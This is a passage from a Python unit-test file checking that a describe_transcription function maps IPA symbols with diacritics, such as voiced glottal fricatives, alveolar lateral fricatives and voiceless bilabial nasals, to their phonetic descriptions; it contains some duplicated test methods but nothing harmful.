expected = "voiced labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized glottal fricative pulmonic egressive consonant
def test_ɦʲ_is_the_representation_of_the_voiced_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʲ")
self.assertEqual(actual, expected)
def test_h̬ʲ_is_the_representation_of_the_voiced_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʲ")
self.assertEqual(actual, expected)
def test_h̬ʲ_is_the_representation_of_the_voiced_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized glottal fricative pulmonic egressive consonant
def test_ɦˠ_is_the_representation_of_the_voiced_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦˠ")
self.assertEqual(actual, expected)
def test_h̬ˠ_is_the_representation_of_the_voiced_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ˠ")
self.assertEqual(actual, expected)
def test_h̬ˠ_is_the_representation_of_the_voiced_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized glottal fricative pulmonic egressive consonant
def test_ɦˤ_is_the_representation_of_the_voiced_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦˤ")
self.assertEqual(actual, expected)
def test_h̬ˤ_is_the_representation_of_the_voiced_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ˤ")
self.assertEqual(actual, expected)
def test_h̬ˤ_is_the_representation_of_the_voiced_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated glottal fricative pulmonic egressive consonant
def test_ɦʰ_is_the_representation_of_the_voiced_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰ_is_the_representation_of_the_voiced_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰ")
self.assertEqual(actual, expected)
def test_h̬ʰ_is_the_representation_of_the_voiced_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized glottal fricative pulmonic egressive consonant
def test_ɦʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰʷ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰʷ")
self.assertEqual(actual, expected)
def test_h̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized glottal fricative pulmonic egressive consonant
def test_ɦʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰʲ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰʲ")
self.assertEqual(actual, expected)
def test_h̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized glottal fricative pulmonic egressive consonant
def test_ɦʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰˠ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰˠ")
self.assertEqual(actual, expected)
def test_h̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized glottal fricative pulmonic egressive consonant
def test_ɦʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰˤ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰˤ")
self.assertEqual(actual, expected)
def test_h̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar lateral fricative pulmonic egressive consonant
def test_ɬ_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ")
self.assertEqual(actual, expected)
def test_ɬ̊_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊")
self.assertEqual(actual, expected)
def test_ɬ̥_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥")
self.assertEqual(actual, expected)
def test_ɮ̊_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊")
self.assertEqual(actual, expected)
def test_ɮ̥_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʷ")
self.assertEqual(actual, expected)
def test_ɬ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊ʷ")
self.assertEqual(actual, expected)
def test_ɬ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥ʷ")
self.assertEqual(actual, expected)
def test_ɮ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʷ")
self.assertEqual(actual, expected)
def test_ɮ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʲ")
self.assertEqual(actual, expected)
def test_ɬ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊ʲ")
self.assertEqual(actual, expected)
def test_ɬ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥ʲ")
self.assertEqual(actual, expected)
def test_ɮ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʲ")
self.assertEqual(actual, expected)
def test_ɮ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar lateral fricative pulmonic egressive consonant
def test_ɬˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬˠ")
self.assertEqual(actual, expected)
def test_ɬ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊ˠ")
self.assertEqual(actual, expected)
def test_ɬ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥ˠ")
self.assertEqual(actual, expected)
def test_ɮ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ˠ")
self.assertEqual(actual, expected)
def test_ɮ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant
def test_ɬˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬˤ")
self.assertEqual(actual, expected)
def test_ɬ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊ˤ")
self.assertEqual(actual, expected)
def test_ɬ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥ˤ")
self.assertEqual(actual, expected)
def test_ɮ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ˤ")
self.assertEqual(actual, expected)
def test_ɮ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰʷ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰʲ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰˠ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰˤ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar lateral fricative pulmonic egressive consonant
def test_ɮ_is_the_representation_of_the_voiced_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ")
self.assertEqual(actual, expected)
def test_ɬ̬_is_the_representation_of_the_voiced_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬")
self.assertEqual(actual, expected)
def test_ɬ̬_is_the_representation_of_the_voiced_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬")
self.assertEqual(actual, expected)
# voiced labialized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʷ_is_the_representation_of_the_voiced_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʷ")
self.assertEqual(actual, expected)
def test_ɬ̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʷ")
self.assertEqual(actual, expected)
def test_ɬ̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʲ_is_the_representation_of_the_voiced_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʲ")
self.assertEqual(actual, expected)
def test_ɬ̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʲ")
self.assertEqual(actual, expected)
def test_ɬ̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar lateral fricative pulmonic egressive consonant
def test_ɮˠ_is_the_representation_of_the_voiced_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮˠ")
self.assertEqual(actual, expected)
def test_ɬ̬ˠ_is_the_representation_of_the_voiced_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ˠ")
self.assertEqual(actual, expected)
def test_ɬ̬ˠ_is_the_representation_of_the_voiced_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar lateral fricative pulmonic egressive consonant
def test_ɮˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮˤ")
self.assertEqual(actual, expected)
def test_ɬ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ˤ")
self.assertEqual(actual, expected)
def test_ɬ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰ_is_the_representation_of_the_voiced_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰʷ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰʲ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰˠ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰˤ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless bilabial nasal pulmonic egressive consonant
def test_m̊_is_the_representation_of_the_voiceless_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊")
self.assertEqual(actual, expected)
def test_m̥_is_the_representation_of_the_voiceless_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥")
self.assertEqual(actual, expected)
# voiceless labialized bilabial nasal pulmonic egressive consonant
def test_m̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʷ")
self.assertEqual(actual, expected)
def test_m̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized bilabial nasal pulmonic egressive consonant
def test_m̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʲ")
self.assertEqual(actual, expected)
def test_m̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized bilabial nasal pulmonic egressive consonant
def test_m̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ˠ")
self.assertEqual(actual, expected)
def test_m̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized bilabial nasal pulmonic egressive consonant
def test_m̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ˤ")
self.assertEqual(actual, expected)
def test_m̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated bilabial nasal pulmonic egressive consonant
def test_m̥ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial nasal pulmonic egressive consonant"
